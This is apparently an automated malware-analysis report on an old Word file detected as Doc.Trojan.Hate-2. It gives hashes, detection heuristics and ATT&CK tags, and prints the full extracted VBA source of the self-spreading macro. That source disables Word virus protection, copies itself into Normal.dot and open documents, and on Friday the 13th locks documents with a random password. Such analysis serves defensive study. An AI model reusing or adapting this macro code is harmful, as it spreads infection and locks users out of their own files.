Office (OLE) malware analysis — malicious · 3168731320e87f7c

MALICIOUS

Office (OLE)

29.0 KB Created: 1998-02-08 15:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: cb7d8efc6607567b58d38e01fb106382 SHA-1: ca04f1107d3df12885888c134a0998fffacd17b6 SHA-256: 3168731320e87f7cc6d7ed4d27b74c25116aebaf03694f46ffc31d7e18a3c5ce

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro named 'Hate' with an AutoOpen subroutine. This macro attempts to copy itself to the Normal.dot template and the active document, indicating an attempt to establish persistence or spread. The presence of legacy WordBasic macro virus markers and the ClamAV detection 'Doc.Trojan.Hate-2' further support its malicious nature. The macro also includes logic to password-protect the document under specific date conditions, though the password itself is generated dynamically.

Heuristics 4

ClamAV: Doc.Trojan.Hate-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hate-2
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1808 bytes
SHA-256: `f82b5bdf9e74116c4bcfd2dd3d35de58cb8f32dd1bc853ad3486d7e83e01d3cb`
Detection ClamAV: Doc.Trojan.Hate-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hate" Sub AutoOpen() Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Hate.AutoOpen" On Error Resume Next Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone WordBasic.DisableAutoMacros = 0 Options.VirusProtection = False If bNormalCheck = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Hate", Object:=wdOrganizerObjectProjectItems NormalTemplate.Save End If If bDocCheck = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Hate", Object:=wdOrganizerObjectProjectItems ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate End If If WeekDay(Now()) = 6 And Day(Now()) = 13 Then For i = 1 To 15 RndChr = Int(Rnd() * (255 - 32) + 32) Pw = Pw + Chr$(RndChr) Next ActiveDocument.Password = Pw End If End Sub Function bNormalCheck() For i = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(J).Name = "Hate" Then bNormalCheck = True Next End Function Function bDocCheck() For i = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(i).Name = "Hate" Then bDocCheck = True Next End Function Sub ToolsMacro() End Sub Sub FileTemplates() End Sub Sub ViewVBCode() End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.